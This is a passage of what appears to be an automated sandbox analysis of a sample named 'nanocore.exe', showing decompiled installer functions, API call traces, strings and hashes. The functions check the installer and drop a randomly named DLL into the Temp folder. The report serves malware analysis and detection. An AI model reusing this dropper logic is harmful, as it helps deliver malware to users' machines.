            • String ID: 'z$"C:\Users\user\Desktop\nanocore.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
            • API String ID: 914957316-891290843
            • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
            • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\jones\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x4e6c2
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x4e6c6
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































            0x00402c42
            0x00402c45
            0x00402c4b
            0x00402c4e
            0x00402c51
            0x00402c64
            0x00402c6a
            0x00402c7d
            0x00402c82
            0x00402c85
            0x00402c8b
            0x00000000
            0x00402c8d
            0x00402c98
            0x00402ca0
            0x00402ca6
            0x00402ca8
            0x00402cad
            0x00402caf
            0x00402dde
            0x00402de0
            0x00402de6
            0x00000000
            0x00000000
            0x00402de8
            0x00402deb
            0x00402e0f
            0x00402e1a
            0x00402e25
            0x00402e2a
            0x00402e2d
            0x00402e2e
            0x00402e2f
            0x00402e31
            0x00402e36
            0x00402e39
            0x00402e5a
            0x00402e5e
            0x00402e64
            0x00402e66
            0x00402e66
            0x00402e66
            0x00402e6e
            0x00402e72
            0x00402e79
            0x00402e7e
            0x00402e80
            0x00402e80
            0x00402e80
            0x00402e88
            0x00402e88
            0x00402e8b
            0x00402e8c
            0x00402e8c
            0x00402e8f
            0x00402e91
            0x00402e91
            0x00402e91
            0x00402e9b
            0x00402ea1
            0x00402eaf
            0x00402eb4
            0x00000000
            0x00402eb4
            0x00402e3c
            0x00000000
            0x00402e3c
            0x00402df3
            0x00402dfe
            0x00402e03
            0x00402e05
            0x00000000
            0x00000000
            0x00402e0a
            0x00402e0d
            0x00000000
            0x00000000
            0x00000000
            0x00402cb5
            0x00402cb5
            0x00402cba
            0x00402cbe
            0x00402cc5
            0x00402cca
            0x00402ccc
            0x00402cce
            0x00402cce
            0x00402cd6
            0x00402cdb
            0x00402cdd
            0x00402e49
            0x00402e4d
            0x00402e52
            0x00402e52
            0x00402e42
            0x00000000
            0x00402e42
            0x00402ce5
            0x00402ceb
            0x00402d6c
            0x00402d70
            0x00402d72
            0x00402d75
            0x00402d7f
            0x00402d85
            0x00402d87
            0x00402da3
            0x00402da3
            0x00402d77
            0x00402d78
            0x00402d78
            0x00402d75
            0x00000000
            0x00402d70
            0x00402cf8
            0x00402cfd
            0x00402d00
            0x00402d06
            0x00000000
            0x00000000
            0x00402d0c
            0x00402d13
            0x00000000
            0x00000000
            0x00402d19
            0x00402d20
            0x00000000
            0x00000000
            0x00402d26
            0x00402d2d
            0x00000000
            0x00000000
            0x00402d2f
            0x00402d36
            0x00000000
            0x00000000
            0x00402d38
            0x00402d3b
            0x00402d3d
            0x00000000
            0x00000000
            0x00402d43
            0x00402d46
            0x00402d4c
            0x00402d50
            0x00402d56
            0x00402d5e
            0x00402d5e
            0x00402d61
            0x00402d61
            0x00402d64
            0x00402d66
            0x00402d68
            0x00402d68
            0x00000000
            0x00402d66
            0x00402d58
            0x00402d5c
            0x00000000
            0x00000000
            0x00000000
            0x00402da6
            0x00402da6
            0x00402dac
            0x00402dbc
            0x00402dbc
            0x00402dbf
            0x00402dc5
            0x00402dc7
            0x00402dc7
            0x00402dcf
            0x00402dd3
            0x00402dd8
            0x00402dd8
            0x00000000
            0x00402dd3

            APIs
            • GetTickCount.KERNEL32 ref: 00402C45
            • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
              • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
              • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
            • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
            Strings
            • "C:\Users\user\Desktop\nanocore.exe" , xrefs: 00402C41
            • verifying installer: %d%%, xrefs: 00402D89
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
            • Error launching installer, xrefs: 00402C8D
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
            • Null, xrefs: 00402D2F
            • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
            • Inst, xrefs: 00402D19
            • soft, xrefs: 00402D26
            • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
            • API String ID: 2181728824-3138192003
            • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
            • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
            Download Yara Rule
            C-Code - Quality: 57%
            			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405538(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c18);
					E004059BF();
				}
				E00405BFB(0x409c18);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405C94(0x409c18);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c18); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c18, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D62(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x7a3008;
						goto L32;
					} else {
						E004059BF(0x40a418, 0x7a4000);
						E004059BF(0x7a4000, 0x409c18);
						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059BF(0x7a4000, 0x40a418);
						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x7a3008 =  *0x7a3008 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c18);
								_push(0xfffffffa);
								E00404D62();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D62(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t87 - 8));
				_push( *((intOrPtr*)(_t87 - 0x1c)));
				_t43 = E00402EBD(); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
					} else {
						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
						lstrcatA(0x409c18,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c18);
					E004052BF();
					goto L29;
				}
				goto L33;
			}


















            0x0040179d
            0x004017a4
            0x004017ad
            0x004017b0
            0x004017b3
            0x004017b8
            0x004017c0
            0x004017dc
            0x004017c2
            0x004017c2
            0x004017c3
            0x004017c3
            0x004017e2
            0x004017ec
            0x004017ec
            0x004017f0
            0x004017f3
            0x004017f8
            0x004017fa
            0x004017fc
            0x00401801
            0x00401801
            0x0040180c
            0x0040180c
            0x0040181d
            0x0040181f
            0x0040181f
            0x00401820
            0x00401820
            0x00401823
            0x00401826
            0x00401829
            0x0040182f
            0x0040182f
            0x00401833
            0x00401833
            0x0040183b
            0x0040184a
            0x0040184f
            0x00401852
            0x00401855
            0x00000000
            0x00000000
            0x00401857
            0x0040185a
            0x004018b4
            0x004018b9
            0x004015ca
            0x004026da
            0x004026da
            0x0040292f
            0x00402932
            0x00402932
            0x00000000
            0x0040185c
            0x00401862
            0x0040186d
            0x0040187a
            0x00401885
            0x0040189b
            0x0040189b
            0x0040189e
            0x00000000
            0x004018a4
            0x004018a4
            0x004018a5
            0x004018c2
            0x00402938
            0x00402938
            0x00402938
            0x004018a7
            0x004018a7
            0x004018a8
            0x00401495
            0x00402293
            0x00402293
            0x00402293
            0x004018a5
            0x0040189e
            0x0040293a
            0x0040293e
            0x0040293e
            0x004018d2
            0x004018d7
            0x004018dd
            0x004018de
            0x004018df
            0x004018e2
            0x004018e5
            0x004018ea
            0x004018f0
            0x004018f4
            0x004018f6
            0x004018fe
            0x0040190a
            0x004018f8
            0x004018f8
            0x004018fc
            0x00000000
            0x00000000
            0x004018fc
            0x00401913
            0x00401919
            0x0040191b
            0x00000000
            0x00401921
            0x00401921
            0x00401924
            0x0040193c
            0x00401926
            0x00401929
            0x00401932
            0x00401932
            0x00401941
            0x00401946
            0x0040228e
            0x00000000
            0x0040228e
            0x00000000

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
            • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
            • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
            • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll$Ivlfdpdlcleoxmzl
            • API String ID: 1152937526-711476632
            • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
            • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78ed38
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78ed38
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























            0x00402ec5
            0x00402ec9
            0x00402ed0
            0x00402ed3
            0x00402ed5
            0x00402ed5
            0x00402ede
            0x00402ee1
            0x00402ee4
            0x00402ee6
            0x00402ee6
            0x00402eed
            0x00402ef2
            0x00402efd
            0x00402efd
            0x00402f08
            0x00402f0f
            0x004030bb
            0x004030bb
            0x00000000
            0x00402f15
            0x00402f19
            0x0040305e
            0x004030ab
            0x004030ad
            0x004030ad
            0x004030b9
            0x004030c0
            0x004030c3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004030b9
            0x00403063
            0x00000000
            0x00000000
            0x0040306a
            0x0040306a
            0x00403070
            0x00403072
            0x00403072
            0x0040307e
            0x00000000
            0x00000000
            0x0040308b
            0x00403093
            0x00403058
            0x00403058
            0x004030bd
            0x004030bd
            0x00000000
            0x0040309a
            0x0040309a
            0x0040309d
            0x004030a4
            0x00000000
            0x00000000
            0x00000000
            0x004030a6
            0x00403093
            0x00000000
            0x0040306a
            0x00402f1f
            0x00402f25
            0x00402f25
            0x00402f2c
            0x00402f32
            0x00402f39
            0x00402f3f
            0x00402f42
            0x00000000
            0x00000000
            0x00402f4d
            0x00402f4d
            0x00402f4d
            0x00402f55
            0x00402f57
            0x00402f57
            0x00402f63
            0x00000000
            0x00000000
            0x00402f69
            0x00402f6c
            0x00402f72
            0x00402f78
            0x00402f78
            0x00402f83
            0x00402f89
            0x00402f8e
            0x00402f95
            0x00402f98
            0x00000000
            0x00000000
            0x00402f9e
            0x00402fa4
            0x00402fa6
            0x00402fb3
            0x00402fb5
            0x00402fe3
            0x00402fe9
            0x00402ff2
            0x00402ff7
            0x00402ff7
            0x00402ffe
            0x0040304c
            0x00000000
            0x00000000
            0x00000000
            0x00403000
            0x00403003
            0x00403025
            0x00403028
            0x0040302b
            0x00403034
            0x00403037
            0x00000000
            0x00000000
            0x0040303d
            0x00403041
            0x00000000
            0x00000000
            0x00000000
            0x00403047
            0x00403011
            0x00403019
            0x00000000
            0x00403020
            0x00403020
            0x00000000
            0x00403020
            0x00403019
            0x00402ffe
            0x00403054
            0x00000000
            0x00403054
            0x00000000
            0x00402f4d

            APIs
            • GetTickCount.KERNEL32 ref: 00402F1F
            • GetTickCount.KERNEL32 ref: 00402FA6
            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
            • wsprintfA.USER32 ref: 00402FE3
            • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
